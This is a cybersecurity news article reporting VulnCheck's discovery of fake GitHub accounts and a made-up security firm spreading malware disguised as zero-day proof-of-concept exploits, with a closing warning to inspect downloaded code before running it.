AI DevwWrld CyberDSA Chatbot Summit Cyber Revolution Summit CYSEC Global Cyber Security & Cloud Expo World Series Digital Identity & Authentication Summit Asian Integrated Resort Expo Middle East Low Code No Code Summit TimeAI Summit

Fraudulent GitHub intrusion: fake accounts spread malware

A network of fake researchers is using GitHub to spread malicious code masquerading as proofs of concept for unknown vulnerabilities

This pill is also available in Italian language

Several fake GitHub accounts associated with a fraudulent cybersecurity firm have been spotted for spreading malicious repositories on the code hosting service. Seven of these repositories, still accessible at the time of writing, pose as test exploits (PoCs) for alleged zero-day vulnerabilities in Discord, Google Chrome, and Microsoft Exchange.

A network of lies

VulnCheck, which discovered the activity, said the authors of these repositories have put a lot of effort into making them plausible. They set up a series of Twitter accounts and profiles, pretending to be members of a non-existent company called High Sierra Cyber Security. VulnCheck first discovered these repositories last May, when they were being used to spread similar PoC exploits for zero-day vulnerabilities in Signal and WhatsApp, both of which have now been removed.

Mask the culprits

Not only did the authors share some of their alleged findings on Twitter to boost their legitimacy, but they even used images of real security researchers from companies like Rapid7, demonstrating significant effort in building the campaign. The PoC is a Python script designed to download a malicious binary and run it on the victim's operating system, be it Windows or Linux. “The attacker put a lot of effort into creating all these fake identities, just to distribute easily recognizable malware,” said VulnCheck researcher Jacob Baines. "It is unclear whether they have been successful, but the fact that they continue to pursue this attack strategy suggests that they believe they may be."

Final considerations on information security

It is currently unknown whether the perpetrator of these activities is a rookie actor or an advanced persistent threat (APT). However, security researchers have already been targeted by domestic North Korean groups in the past, as revealed by Google in January 2021. These events underscore the importance of exercising caution when downloading code from open source repositories. It is imperative that users carefully examine code before execution to ensure that it does not pose a security risk.

Follow us on WhatsApp for more pills like this

06/14/2023 11:02

Marco Verro

Complementary pills

Silent infiltration: the malicious code epidemic on GitHubImpact of malicious code in repositories: security risks in software development

Last pills

Zero-day threat on Android devices: Samsung prepares a crucial updateFind out how Samsung is addressing critical Android vulnerabilities and protecting Galaxy devices from cyber threats

CrowdStrike: how a security update crippled the tech worldGlobal impact of a security update on banking, transportation and cloud services: what happened and how the crisis is being addressed

Checkmate the criminal networks: the Interpol operation that reveals the invisibleFind out how Operation Interpol exposed digital fraudsters and traffickers through extraordinary global collaboration, seizing luxury goods and false documents

Google Cloud security predictions for 2024: how AI will reshape the cybersecurity landscapeFind out how AI will transform cybersecurity and address geopolitical threats in 2024 according to Google Cloud report